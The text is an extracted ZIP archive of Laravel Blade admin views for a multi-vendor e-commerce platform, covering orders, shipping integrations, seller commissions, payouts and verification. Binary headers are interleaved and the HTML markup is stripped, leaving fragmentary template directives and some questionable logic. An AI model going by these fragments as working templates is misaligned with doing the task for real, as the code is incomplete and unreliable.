    {{ $browser['browser'] }} {{ $browser['screenPageViews'] }}
    {{ translate('Most Visited Pages') }}
    @foreach($topPages as $page) @endforeach
    {{ translate('Page Title') }} {{ translate('Views') }}
    {{ $page['pageTitle'] }}
    {{ Str::limit($page['fullPageUrl'], 50) }}
    {{ $page['screenPageViews'] }}
    {{ translate('Top Countries') }}
    @foreach($topCountries as $country) @if(!empty($country['country'])) @endif @endforeach
    {{ translate('Country') }} {{ translate('Views') }}
    {{ $country['country'] }} {{ $country['screenPageViews'] }}
    {{ translate('Top Referrers') }}
    @foreach($topReferrers as $referrer) @endforeach
    {{ translate('Source') }} {{ translate('Views') }}
    @if(empty($referrer['pageReferrer'])) {{ translate('Direct') }} @else {{ Str::limit($referrer['pageReferrer'], 30) }} @endif
    {{ $referrer['screenPageViews'] }}
    @endsection @section('script') @endsectionPK�N]t�k[����#views/backend/sales/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{$order_types}}

    @php $thermal_printer = json_decode(get_setting('thermal_printer'), true) ?? []; @endphp @if($seller_type == 'seller')
    @endif
    @if(Route::currentRouteName() != 'unpaid_orders.index')
    @endif
    @endsection @section('modal') @include('modals.loading_modal')
    {{-- Bulk Unpaid Order Payment Notification --}} @endsection @section('script') @endsection PK�N]6�x���"views/backend/sales/show.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Order Details') }}

    @php $delivery_status = $order->delivery_status; $payment_status = $order->payment_status; $admin_user_id = get_admin()->id; $first_order = $order->orderDetails->first(); $shipping_method = $order->shipping_method ?? null; @endphp @if ($order->seller_id == $admin_user_id || get_setting('product_manage_by_admin') == 1) @if (addon_is_activated('delivery_boy')) @if ($shipping_method != 'shiprocket' && $shipping_method != 'steadfast' && $shipping_method != 'pathao' && $shipping_method != 'redx')
    @if (($delivery_status == 'pending' || $delivery_status == 'confirmed' || $delivery_status == 'picked_up') && auth()->user()->can('assign_delivery_boy_for_orders')) @else @endif
    @endif @endif
    @if (auth()->user()->can('update_order_payment_status') && $payment_status == 'unpaid' && $order->payment_type != 'cash_on_delivery') {{-- @else @endif
    @if ($order->shipping_method == 'shiprocket' || $order->shipping_method == 'steadfast' || $order->shipping_method == 'pathao' || $order->shipping_method == 'redx') @elseif (auth()->user()->can('update_order_delivery_status') && $delivery_status != 'delivered' && $delivery_status != 'cancelled') @else @endif
    @if (addon_is_activated('shiprocket') || addon_is_activated('steadfast') || addon_is_activated('pathao') || addon_is_activated('redx')) @php $addons = []; $availableAddons = ['shiprocket', 'steadfast', 'pathao', 'redx']; foreach ($availableAddons as $addon) { if (addon_is_activated($addon)) { $addons[] = $addon; } } $shipping_systems = App\Models\ShippingSystem::where('active', 1) ->whereIn('name', $addons) ->get(); @endphp
    @if ($order->delivery_status == 'pending' || $order->delivery_status == 'confirmed') @if ($shipping_method) @else @endif @else @endif
    @if ($order->shipping_method == 'shiprocket')
    @if ($order->shiprocket_awb != null)
    @endif @elseif ($order->shipping_method == 'steadfast')
    @elseif ($order->shipping_method == 'pathao')
    @elseif ($order->shipping_method == 'redx')
    @endif @if ($order->shipping_method == 'shiprocket' && $order->shiprocket_shipment_id)
    @if($order->shiprocket_courier_id) @else @endif
    @endif @if($order->shiprocket_awb && !$order->pickup_scheduled_at)
    @endif @endif @if ($shipping_method === 'shiprocket') @if($order->pickup_scheduled_at)
    @endif
    @elseif($shipping_method === 'steadfast')
    @elseif($shipping_method === 'pathao')
    @elseif($shipping_method === 'redx')
    @endif @if($order->shipping_method === 'shiprocket' && $order->shiprocket_awb)
    @if($delivery_status != 'cancelled')
    @endif @endif
    @endif
    @php $removedXML = ''; @endphp {!! str_replace($removedXML, '', QrCode::size(100)->generate($order->code)) !!}
    @if(json_decode($order->shipping_address))
    {{ json_decode($order->shipping_address)->name }}
    {{ json_decode($order->shipping_address)->email }}
    {{ json_decode($order->shipping_address)->phone }}
    {{ json_decode($order->shipping_address)->address }}, {{ json_decode($order->shipping_address)->city }}, @if(isset(json_decode($order->shipping_address)->state)) {{ json_decode($order->shipping_address)->state }} - @endif {{ json_decode($order->shipping_address)->postal_code }}
    {{ json_decode($order->shipping_address)->country }}
    @else
    {{ $order->user->name }}
    {{ $order->user->email }}
    {{ $order->user->phone }}
    @endif @if ($order->manual_payment && is_array(json_decode($order->manual_payment_data, true)))
    {{ translate('Payment Information') }}
    {{ translate('Name') }}: {{ json_decode($order->manual_payment_data)->name }}, {{ translate('Amount') }}: {{ single_price(json_decode($order->manual_payment_data)->amount) }}, {{ translate('TRX ID') }}: {{ json_decode($order->manual_payment_data)->trx_id }}

    @endif {{ translate('Sold By') }}:
    {{ $order->shop->name ?? get_setting('site_name') }} @php $gstin = get_seller_gstin($order); @endphp @if($gstin && is_numeric($first_order->gst_amount))
    {{ translate('GSTIN') }}: {{ $gstin }} @endif
    {{ get_seller_address($order) }}
    {{ translate('Order #') }} {{ $order->code }}
    {{ translate('Order Status') }} @if ($delivery_status == 'delivered') {{ translate(ucfirst(str_replace('_', ' ', $delivery_status))) }} @else {{ translate(ucfirst(str_replace('_', ' ', $delivery_status))) }} @endif
    {{ translate('Order Date') }} {{ date('d-m-Y h:i A', $order->date) }}
    {{ translate('Total amount') }} {{ single_price($order->grand_total) }}
    {{ translate('Payment method') }} {{ translate(ucfirst(str_replace('_', ' ', $order->payment_type))) }}
    {{ translate('Additional Info') }} {{ $order->additional_info }}

    @if(is_numeric($first_order->gst_amount)) @if(same_state_shipping($order)) @else @endif @else @endif @foreach ($order->orderDetails as $key => $orderDetail) @if(is_numeric($first_order->gst_amount)) @php $gst_amount = get_gst_by_price_and_rate($orderDetail->price - $orderDetail->coupon_discount , $orderDetail->gst_rate); $shipping_gst = get_gst_by_price_and_rate($orderDetail->shipping_cost, $orderDetail->gst_rate); @endphp @if(same_state_shipping($order)) @else @endif @else @endif @if(is_numeric($first_order->gst_amount)) @else @endif @if(is_numeric($first_order->gst_amount)) @if(same_state_shipping($order)) @else @endif @endif @endforeach
    # {{ translate('Photo') }} {{ translate('Description') }} {{ translate('Delivery Type') }} {{ translate('Qty') }} {{ translate('Gross Amount')}} {{ translate('Discount/ Coupon')}} {{ translate('Taxable Value')}}{{ translate('CGST') }} {{ translate('SGST') }}{{ translate('IGST') }} {{ translate('Price') }} {{ translate('Total') }}
    {{ $key + 1 }} @if ($orderDetail->product != null && $orderDetail->product->auction_product == 0) @elseif ($orderDetail->product != null && $orderDetail->product->auction_product == 1) @else {{ translate('N/A') }} @endif @if ($orderDetail->product != null && $orderDetail->product->auction_product == 0) {{ $orderDetail->product->getTranslation('name') }} {{ $orderDetail->variation }}
    @php $product_stock = $orderDetail->product->stocks->where('variant', $orderDetail->variation)->first(); @endphp {{translate('SKU')}}: {{ $product_stock['sku'] ?? '' }} @elseif ($orderDetail->product != null && $orderDetail->product->auction_product == 1) {{ $orderDetail->product->getTranslation('name') }} @else {{ translate('Product Unavailable') }} @endif
    @if ($order->shipping_type != null && $order->shipping_type == 'home_delivery') {{ translate('Home Delivery') }} @elseif ($order->shipping_type == 'pickup_point') @if ($order->pickup_point != null) {{ $order->pickup_point->getTranslation('name') }} ({{ translate('Pickup Point') }}) @else {{ translate('Pickup Point') }} @endif @elseif($order->shipping_type == 'carrier') @if ($order->carrier != null) {{ $order->carrier->name }} ({{ translate('Carrier') }})
    {{ translate('Transit Time').' - '.$order->carrier->transit_time }} @else {{ translate('Carrier') }} @endif @endif
    {{ $orderDetail->quantity }} {{ single_price($orderDetail->price) }} {{ single_price($orderDetail->coupon_discount) }} {{ single_price($orderDetail->price - $orderDetail->coupon_discount) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount) }} {{ single_price($orderDetail->price / $orderDetail->quantity) }} {{ single_price($orderDetail->price - $orderDetail->coupon_discount + $gst_amount) }} {{ single_price($orderDetail->price) }}
    {{translate('Shipping')}} 1 {{ single_price($orderDetail->shipping_cost) }} {{ single_price(0) }} {{ single_price($orderDetail->shipping_cost) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst) }} {{ single_price($orderDetail->shipping_cost + (($orderDetail->shipping_cost* $orderDetail->gst_rate)/100)) }}
    @if(is_numeric($first_order->gst_amount)) @else @endif
    {{ translate('Sub Total') }} : {{ single_price($order->orderDetails->sum('price') + $order->orderDetails->sum('shipping_cost') - $order->orderDetails->sum('coupon_discount')) }}
    {{ translate('Total GST') }} : {{ single_price($order->orderDetails->sum('gst_amount')) }}
    {{ translate('Sub Total') }} : {{ single_price($order->orderDetails->sum('price')) }}
    {{ translate('Tax') }} : {{ single_price($order->orderDetails->sum('tax')) }}
    {{ translate('Shipping') }} : {{ single_price($order->orderDetails->sum('shipping_cost')) }}
    {{ translate('Coupon') }} : {{ single_price($order->coupon_discount) }}
    {{ translate('TOTAL') }} : {{ single_price($order->grand_total) }}
    @endsection @section('modal')
    @endsection @section('script') @if (addon_is_activated('shiprocket')) @endif @if (addon_is_activated('steadfast')) @endif @if (addon_is_activated('pathao')) @endif @if (addon_is_activated('redx')) @endif @endsection PK�N]�+�!;!;*views/backend/sales/orders_table.blade.phpnu�[���
    @if (auth()->user()->can('product_delete')) @else @endif @if (addon_is_activated('refund_request')) @endif @forelse ($orders as $key => $order) @if (addon_is_activated('refund_request')) @endif @empty @endforelse
    #{{ translate('Order Code') }} {{ translate('Products') }} {{ translate('Customer') }} {{ translate('Seller') }} {{ translate('Amount') }} {{ translate('Delivery Status') }} {{ translate('Payment method') }} {{ translate('Payment Status') }}{{ translate('Refund') }}{{ translate('Options') }}
    @if (auth()->user()->can('delete_order') || auth()->user()->can('export_order'))
    @else
    {{ $key + 1 + ($orders->currentPage() - 1) * $orders->perPage() }}
    @endif
    {{ $order->code }} @if ($order->shipping_method == 'shiprocket')
    {{ translate('Shiprocket Order Id') }}: {{ $order->shiprocket_order_id }} @elseif ($order->shipping_method == 'steadfast')
    {{ translate('Steadfast Consignment Id') }}: {{ $order->steadfast_consignment_id }} @elseif ($order->shipping_method == 'pathao')
    {{ translate('Pathao Consignment Id') }}: {{ $order->pathao_consignment_id }} @elseif ($order->shipping_method == 'redx')
    {{ translate('Redx Tracking Id') }}: {{ $order->redx_tracking_id }} @endif @if ($order->viewed == 0) {{ translate('New') }} @endif @if (addon_is_activated('pos_system') && $order->order_from == 'pos') {{ translate('POS') }} @php $source = strtolower($order->order_source); $badgeClass = match($source) { 'walkin' => 'badge-warning', 'facebook' => 'badge-primary', 'whatsapp' => 'badge-success', default => 'badge-danger', }; @endphp {{ ucfirst($order->order_source) }} @endif @if ($order->order_note != null) @endif
    {{ count($order->orderDetails) }} @if ($order->user != null) {{ $order->user->name }} @else Guest ({{ $order->guest_id }}) @endif @php $shop = optional($order->shop); @endphp {{-- max 20 charsthen ..., add title --}} {{ Str::limit($shop->name, 20)?? translate('Inhouse') }}

    {{ single_price($order->grand_total) }}

    {{ translate(ucfirst(str_replace('_', ' ', $order->delivery_status))) }}

    @if ($order->shipping_method == 'shiprocket') {{ translate('Shiprocket Status') }}: {{ ucfirst(translate(str_replace('_', ' ', $order->shiprocket_status))) }} @elseif ($order->shipping_method == 'steadfast') {{ translate('Steadfast Status') }}: {{ ucfirst(translate(str_replace('_', ' ', $order->steadfast_status))) }} @elseif ($order->shipping_method == 'pathao') {{ translate('Pathao Status') }}: {{ ucfirst(translate(str_replace('_', ' ', $order->pathao_status))) }} @elseif ($order->shipping_method == 'redx') {{ translate('Redx Status') }}: {{ ucfirst(translate(str_replace('_', ' ', $order->redx_status))) }} @endif
    {{ translate(ucfirst(str_replace('_', ' ', $order->payment_type))) }} @if ($order->payment_status == 'paid') {{ translate('Paid') }} @else {{ translate('Unpaid') }} @endif @if (count($order->refund_requests) > 0) {{ count($order->refund_requests) }} {{ translate('Refund') }} @else {{ translate('No Refund') }} @endif
    {{ translate('No Orders found!') }}
    @if($orders->hasPages()) @endif
    PK�N]i�3�:�:0views/backend/sales/manage_order_modal.blade.phpnu�[���
    #{{ $order->code }}
    @php $delivery_status = $order->delivery_status; $payment_status = $order->payment_status; $shipping_method = $order->shipping_method ?? null; @endphp @if (addon_is_activated('delivery_boy')) @if (!in_array($shipping_method, ['shiprocket','steadfast','pathao','redx']))
    @if (in_array($delivery_status, ['pending','confirmed','picked_up']) && auth()->user()->can('assign_delivery_boy_for_orders')) @else @endif
    @endif @endif
    @if (auth()->user()->can('update_order_payment_status') && $payment_status == 'unpaid' && $order->payment_type != 'cash_on_delivery') @else @endif
    @if (in_array($shipping_method, ['shiprocket','steadfast','pathao','redx'])) @elseif (auth()->user()->can('update_order_delivery_status') && !in_array($delivery_status, ['delivered','cancelled'])) @else @endif
    @if (addon_is_activated('shiprocket') || addon_is_activated('steadfast') || addon_is_activated('pathao') || addon_is_activated('redx')) @php $addons = []; foreach (['shiprocket','steadfast','pathao','redx'] as $addon) { if (addon_is_activated($addon)) $addons[] = $addon; } $shipping_systems = App\Models\ShippingSystem::where('active', 1)->whereIn('name', $addons)->get(); @endphp
    @if (in_array($order->delivery_status, ['pending','confirmed'])) @if ($shipping_method) @else @endif @else @endif
    @if ($shipping_method == 'shiprocket')
    @if ($order->shiprocket_awb)
    @endif @elseif ($shipping_method == 'steadfast')
    @elseif ($shipping_method == 'pathao')
    @elseif ($shipping_method == 'redx')
    @endif @if ($shipping_method == 'shiprocket' && $order->shiprocket_shipment_id && !$order->shiprocket_courier_id)
    @elseif ($shipping_method == 'shiprocket' && $order->shiprocket_courier_id)
    @endif @if ($shipping_method === 'shiprocket') @if ($order->pickup_scheduled_at)
    @endif
    @if ($order->shiprocket_awb && !$order->pickup_scheduled_at)
    {{ translate('Clicking Confirm will request a pickup for this order.') }}
    @endif @if ($order->shiprocket_awb)
    @if ($delivery_status != 'cancelled')
    @endif @endif @elseif ($shipping_method === 'steadfast')
    @elseif ($shipping_method === 'pathao')
    @elseif ($shipping_method === 'redx')
    @endif @if ($order->order_from != 'pos')
    @endif @else @if ($order->order_from != 'pos')
    @endif @endif
    PK�N]��W�#�#Gviews/backend/sellers/category_wise_commission/set_commission.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{translate('Set Category Wise Commission')}}

    If you set commission on the main Category, All the sister category will get that commission unless you change individually.

    @if (get_setting('category_wise_commission') != 1)

    {{ translate('Commission Type is not Category Based, set commission type ') }} {{ translate('Here') }}

    @endif @if (get_setting('vendor_commission_activation') != 1)

    {{ translate(' Seller Commission is not Activated, Active ') }} {{ translate('Here') }}

    @endif
    {{ translate('Categories') }}
    @foreach($categories as $key => $category) @endforeach
    # {{translate('Icon')}} {{translate('Name')}} {{ translate('Parent Category') }} {{ translate('Commission Rate') }} {{ translate('Action') }}
    {{ ($key+1) + ($categories->currentPage() - 1)*$categories->perPage() }} @if($category->icon != null) {{translate('icon')}} @else — @endif {{ $category->getTranslation('name') }} @if($category->digital == 1) {{translate('Digital')}} @endif @php $parent = \App\Models\Category::where('id', $category->parent_id)->first(); @endphp @if ($parent != null) {{ $parent->getTranslation('name') }} @else — @endif
    %
    {{ $categories->appends(request()->input())->links() }}
    @endsection @section('modal') @endsection @section('script') @endsectionPK�N]suG�\\&views/backend/sellers/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @if (env('MAIL_USERNAME') == null && env('MAIL_PASSWORD') == null)
    {{ translate('You need to configure SMTP correctly to to add Seller.') }} {{ translate('Configure Now') }}
    @endif
    {{translate('Add New Seller')}}
    {{translate('Seller Information')}}
    @csrf
    @if ($errors->has('name')) {{ $errors->first('name') }} @endif
    @if ($errors->has('email')) {{ $errors->first('email') }} @endif
    @if ($errors->has('shop_name')) {{ $errors->first('shop_name') }} @endif
    @if ($errors->has('address')) {{ $errors->first('address') }} @endif
    @endsection PK�N]����$views/backend/sellers/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Edit Seller Information')}}
    {{translate('Seller Information')}}
    @csrf
    @endsection PK�N]A��Kynyn%views/backend/sellers/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php $route = Route::currentRouteName() == 'sellers.index' ? 'all_seller_route' : 'seller_rating_followers'; @endphp
    @if(auth()->user()->can('add_seller') && ($route == 'all_seller_route')) {{ translate('Add New Seller') }} @endif
    @if($route == 'all_seller_route')
    @endif {{--
    --}}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') {{-- Edit Seller Custom Followers --}} @endsection @section('script') @endsection PK�N]�-n��'views/backend/sellers/payment.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ $user->name }} ({{ $user->shop->name }})
    @foreach($payments as $key => $payment) @endforeach
    # {{translate('Date')}} {{translate('Amount')}} {{ translate('Payment Details') }}
    {{ $key+1 }} {{ $payment->created_at }} {{ single_price($payment->amount) }} {{ ucfirst(str_replace('_', ' ', $payment->payment_method)) }} @if ($payment->txn_code != null) ({{ translate('TRX ID') }} : {{ $payment->txn_code }}) @endif
    @endsection PK�N]����7views/backend/sellers/payment_histories/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Seller Payments')}}

    @foreach($payments as $key => $payment) @php $user = \App\Models\User::find($payment->seller_id); @endphp @if ($user && $user->shop) @endif @endforeach
    # {{translate('Date')}} {{translate('Seller')}} {{translate('Amount')}} {{ translate('Payment Details') }}
    {{ $key+1 }} {{ $payment->created_at }} {{ $user->name }} ({{ $user->shop->name }}) {{ single_price($payment->amount) }} {{ translate(ucfirst(str_replace('_', ' ', $payment->payment_method))) }} @if ($payment->txn_code != null) ({{ translate('TRX ID') }} : {{ $payment->txn_code }}) @endif
    {{ $payments->links() }}
    @endsection PK�N]j*MB��-views/backend/sellers/payment_modal.blade.phpnu�[���
    @csrf
    PK�N]��nT22.views/backend/sellers/pending_seller.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Pending Sellers') }}

    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') @endsection @section('script') @endsection PK�N]�<�E����-views/backend/sellers/profile/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ $shop->name }}
    {{ $shop->name }} @if($shop->verification_status)
    @endif
    {{ $shop->user->email }}
    @if($shop->user->phone)
    {{ $shop->user->phone }}
    @endif
    @can('product_delete' || 'order_delete') @endcan
              
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') {{-- Unpaid Order Payment Notification --}} {{-- edit gstin --}} @endsection @section('script') @endsectionPK�N]���J J 8views/backend/sellers/profile/seller_documents.blade.phpnu�[���
    @if (json_decode($shop->verification_info) && is_array(json_decode($shop->verification_info))) @foreach (json_decode($shop->verification_info) as $key => $info) @if ($info->type == 'file') @php $file_path = $info->value; $file_name = basename($file_path); $extension = strtolower(pathinfo($file_path, PATHINFO_EXTENSION)); $is_image = in_array($extension, ['jpg', 'jpeg', 'png', 'webp', 'gif']); @endphp
    @if ($is_image)
    @elseif ($extension == 'pdf')
    @else
    @endif
    {{ $info->label ?? $file_name }} .{{ $extension }}
    @endif @endforeach @endif
    PK�N]4ܩ/}}5views/backend/sellers/profile/seller_orders.blade.phpnu�[���
    {{translate('Orders')}}
    @foreach ($orders as $key => $order_id) @php $order = \App\Models\Order::find($order_id->id); @endphp @if ($order != null) @endif @endforeach
    {{translate('Order ID')}} {{translate('Order Date')}} {{translate('Amount')}} {{translate('Due')}} {{translate('Status')}} {{translate('Action')}}
    {{ $order->code }} {{ date('d M, Y', $order->date) }} {{ single_price($order->grand_total) }} @if ($order->payment_status == 'unpaid') {{ single_price($order->grand_total) }} @else {{ single_price(0.00) }} @endif @if ($order->delivery_status == 'delivered') {{ translate(ucfirst(str_replace('_', ' ', $order->delivery_status))) }} @elseif ($order->delivery_status == 'cancelled') {{ translate(ucfirst(str_replace('_', ' ', $order->delivery_status))) }} @elseif ($order->delivery_status == 'pending') {{ translate(ucfirst(str_replace('_', ' ', $order->delivery_status))) }} @else {{ translate(ucfirst(str_replace('_', ' ', $order->delivery_status))) }} @endif
    {{ $orders->appends(request()->input())->links() }}
    PK�N]&���>�>7views/backend/sellers/profile/seller_overview.blade.phpnu�[���
    {{translate('Total Products')}}

    {{ App\Models\Product::where('user_id', $shop->user->id)->get()->count() }}

    Browse Products on Client Side
    {{translate('Total Orders Received')}}

    {{ App\Models\OrderDetail::where('seller_id', $shop->user->id)->get()->count() }}

    {{translate('Total Delivered Orders')}}
    {{ App\Models\Order::where('seller_id', $shop->user->id)->where('delivery_status', 'delivered')->get()->count() }}
    {{translate('Total Pending Orders')}}
    {{ App\Models\Order::where('seller_id', $shop->user->id)->where('delivery_status', 'pending')->get()->count() }}
    {{translate('Total Sold Amount')}}
    @php $orderDetails = \App\Models\OrderDetail::where('seller_id', $shop->user->id)->get(); $total = 0; foreach ($orderDetails as $key => $orderDetail) { if($orderDetail->order != null && $orderDetail->order->payment_status == 'paid'){ $total += $orderDetail->price; } } @endphp

    {{ single_price($total) }}

    {{translate('Wallet Balance')}}

    {{ single_price($shop->user->balance) }}

    {{translate('Commission Paid to Platform')}}

    @php $admin_commission = App\Models\CommissionHistory::where('seller_id', $shop->user->id)->sum('admin_commission'); @endphp {{ single_price($admin_commission) }}

    {{translate('Total Withdrawn Amount')}}

    @php $withdrawnAmount = App\Models\SellerWithdrawRequest::where('user_id', $shop->user->id)->where('status', 1)->sum('amount'); @endphp {{ single_price($withdrawnAmount) }}

    {{translate('Last Payout Date')}}
    {{ optional(App\Models\SellerWithdrawRequest::where('user_id', $shop->user->id)->where('status', 1)->latest()->first())->created_at?->format('d M, Y') ?? '' }}
    {{translate('Pending Withdrawal Request')}}
    {{ App\Models\SellerWithdrawRequest::where('user_id', $shop->user->id)->where('status', 0)->get()->count() }}
    @if($shop->verification_status == 1 && $shop->verification_info != null)
    {{translate('Verification Status')}}

    {{translate('Verified')}}

    {{translate('View Submitted Form')}}
    @elseif($shop->verification_status == 1 && $shop->verification_info == null)
    {{translate('Verification Status')}}

    {{translate('Verified')}}

    {{translate('By Admin')}}
    @elseif($shop->verification_status != 1 && $shop->verification_info != null)
    {{translate('Verification Status')}}

    {{translate('Pending Approval')}}

    {{translate('View Submitted Form')}}
    @else
    {{translate('Verification Status')}}

    {{translate('Not Applied')}}

    @endif
    {{translate('Seller Info')}}
    {{translate('Name')}}
    {{ $shop->user->name }}
    {{translate('Email')}}
    {{ $shop->user->email }}
    {{translate('Phone Number')}}
    {{ $shop->user->phone }}
    {{translate('Account Creation')}}
    {{ $shop->created_at->format('d F, Y') }}
    {{translate('Last Login Date')}}
    {{ $shop->last_login ? $shop->last_login->format('d F, Y') : 'N/A' }}
    {{translate('Status')}}
    @if($shop->user->banned != 1)
    {{translate('Active')}}
    @elseif($shop->user->banned == 1)
    {{translate('Blocked')}}
    @endif @if($shop->user->is_suspicious == 1)
    {{translate('Suspicious')}}
    @endif
    {{translate('Address')}}
    @if($default_shipping_address)
    {{translate('Default Shipping Address')}}
    {{ $default_shipping_address->address }}, {{ $default_shipping_address->area ? $default_shipping_address->area->name . ',' : '' }} {{ $default_shipping_address->city ? $default_shipping_address->city->name . ',' : '' }} {{ $default_shipping_address->state ? $default_shipping_address->state->name : '' }} {{ '-'. $default_shipping_address->postal_code }}, {{ $default_shipping_address->country ? $default_shipping_address->country->name : '' }}
    @endif @if($addresses && count($addresses))
    {{translate('Other Address')}}
    @foreach($addresses as $address)
    {{ $address->address }}, {{ $address->area ? $address->area->name . ',' : '' }} {{ $address->city ? $address->city->name . ',' : '' }} {{ $address->state ? $address->state->name : '' }} {{ '-'. $address->postal_code }}, {{ $address->country ? $address->country->name : '' }}
    @endforeach
    @endif {{--
    Default Billing Address
    1713 Greenfelder Plaza, North Winonaport,
    Florida - 44649, Benin
    --}} {{--
    Warehouse Address
    88 Holly Ridge Drive, Port Elizabeth,
    New Jersey - 8854, South Africa
    --}}
    @if(addon_is_activated('gst_system')) @php $business_info = json_decode($shop->business_info, true); @endphp
    {{translate('GST Information')}}
    {{translate('GSTIN')}}: {{ $business_info['gstin'] ?? '' }}
    @endif
    PK�N]l‡��7views/backend/sellers/profile/seller_payments.blade.phpnu�[���
    {{ translate('Payment History') }}
    @foreach ($payments as $key => $payment) @endforeach
    # {{ translate('Date') }} {{ translate('Amount') }} {{ translate('Payment Method') }}
    {{ $key + 1 }} {{$payment->created_at->format('d F, Y')}} {{ single_price($payment->amount) }} {{ ucfirst(str_replace('_', ' ', $payment->payment_method)) }} @if ($payment->txn_code != null) ({{ translate('TRX ID') }} : {{ $payment->txn_code }}) @endif
    {{ $payments->appends(request()->input())->links() }}
    PK�N]fK����7views/backend/sellers/profile/seller_products.blade.phpnu�[���
    {{translate('Items')}}
    @foreach($products as $product) @endforeach
    {{translate('Product')}} {{translate('SKU')}} {{translate('Purchase Price')}} {{translate('Current Stock')}} {{translate('Last Purchase Date')}} {{translate('Action')}}
    {{ $product->getTranslation('name') }} @if ($product->stocks->count() > 1) Variant Product @else {{ $product->stocks->first()->sku ?? 'N/A' }} @endif {{ single_price($product->purchase_price) }} @php $qty = 0; foreach ($product->stocks as $key => $stock) { $qty += $stock->qty; } echo $qty; @endphp @php $last_purchase = $product->orderDetails->sortByDesc('created_at')->first(); if ($last_purchase) { echo $last_purchase->created_at->format('d M Y'); } else { echo 'N/A'; } @endphp
    {{ $products->appends(request()->input())->links() }}
    PK�N]+ߞC� � -views/backend/sellers/profile_modal.blade.phpnu�[��� PK�N]�ֱ��%�%Fviews/backend/sellers/seller_based_commission/set_commission.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php $route = Route::currentRouteName() == 'sellers.index' ? 'all_seller_route' : 'seller_rating_followers'; @endphp

    {{translate('Set Seller Based Commission')}}

    @if(get_setting('seller_commission_type') != 'seller_based' || get_setting('vendor_commission_activation') != 1)
    @if(get_setting('seller_commission_type') != 'seller_based')

    {{ translate('Commission Type is not Seller Based, set commission type ') }} {{ translate('Here') }}

    @endif @if (get_setting('vendor_commission_activation') != 1)

    {{ translate(' Seller Commission is not Activated, Active ') }} {{ translate('Here') }}

    @endif
    @endif
    {{ translate('Sellers') }}
    @foreach($shops as $key => $shop) @endforeach
    # {{translate('Name')}} {{translate('Phone')}} {{translate('Email Address')}} {{ translate('Num. of Products') }} {{translate('Email Verification')}} {{ translate('Status') }} {{ translate('Commission') }} {{translate('Options')}}
    {{ ($key+1) + ($shops->currentPage() - 1)*$shops->perPage() }}
    Image
    {{ $shop->name }}
    {{$shop->user->phone}} {{$shop->user->email}} {{ $shop->user->products->count() }} @if($shop->user->email_verified_at != null) {{translate('Verified')}} @else {{translate('Unverified')}} @endif @if($shop->user->banned) {{ translate('Ban') }} @else {{ translate('Regular') }} @endif
    %
    {{ $shops->appends(request()->input())->links() }}
    @endsection @section('modal') @endsection @section('script') @endsection PK�N]�Ad�##7views/backend/sellers/seller_commission/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Seller Commission Activatation')}}

    {{translate('Commission Type')}}

    @csrf
    {{translate('Withdraw Seller Amount')}}
    @csrf
    @if(get_setting('seller_commission_type') == 'fixed_rate')
    {{translate('Fixed Commission Rate')}}
    @csrf
    %
    @endif
    {{translate('Note')}}
    • 1. {{ translate('If the Commission Type is Fixed Rate') }}, {{ get_setting('vendor_commission') }}% {{translate('of seller product price will be deducted from seller earnings') }}.
    • 2. {{ translate('If the Commission Type is Seller Based, set commission percentage ') }} {{ translate('Here') }}
    • 3. {{ translate('If the Commission Type is Category Based, set commission percentage ') }} {{ translate('Here') }}
    @endsection @section('script') @endsection PK�N]�s�%�%>views/backend/sellers/seller_verification_form/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Seller Verification Form')}}
    @csrf
    @foreach (json_decode(get_setting('verification_form')) as $key => $element) @if ($element->type == 'text' || $element->type == 'file')
    @elseif ($element->type == 'select' || $element->type == 'multi_select' || $element->type == 'radio')
    @if (is_array(json_decode($element->options))) @foreach (json_decode($element->options) as $value)
    @endforeach @endif
    @endif @endforeach
    • {{translate('Text Input')}}
    • {{translate('Select')}}
    • {{translate('Multiple Select')}}
    • {{translate('Radio')}}
    • {{translate('File')}}
    @endsection @section('script') @endsection PK�N]���4mm>views/backend/sellers/seller_withdraw_requests/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Seller Withdraw Request')}}
    @foreach($seller_withdraw_requests as $key => $seller_withdraw_request) @php $user = \App\Models\User::find($seller_withdraw_request->user_id); @endphp @if ($user && $user->shop) @endif @endforeach
    # {{translate('Date')}} {{translate('Seller')}} {{translate('Total Amount to Pay')}} {{translate('Requested Amount')}} {{ translate('Message') }} {{ translate('Status') }} {{translate('Options')}}
    {{ ($key+1) + ($seller_withdraw_requests->currentPage() - 1)*$seller_withdraw_requests->perPage() }} {{ $seller_withdraw_request->created_at }} {{ $user->name }} ({{ $user->shop->name }}) {{ single_price($user->shop->admin_to_pay) }} {{ single_price($seller_withdraw_request->amount) }} {{ $seller_withdraw_request->message }} @if ($seller_withdraw_request->status == 1) {{translate('Paid')}} @else {{translate('Pending')}} @endif @can('pay_to_seller') @endcan @can('seller_payment_history') @endcan
    {{ $seller_withdraw_requests->links() }}
    @endsection @section('modal') @endsection @section('script') @endsection PK�N] ���Fviews/backend/sellers/seller_withdraw_requests/payment_modal.blade.phpnu�[���
    @csrf
    PK�N]Y���Oviews/backend/sellers/seller_withdraw_requests/withdraw_message_modal.blade.phpnu�[��� PK�N]r��D66,views/backend/sellers/verification.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Seller Verification') }}
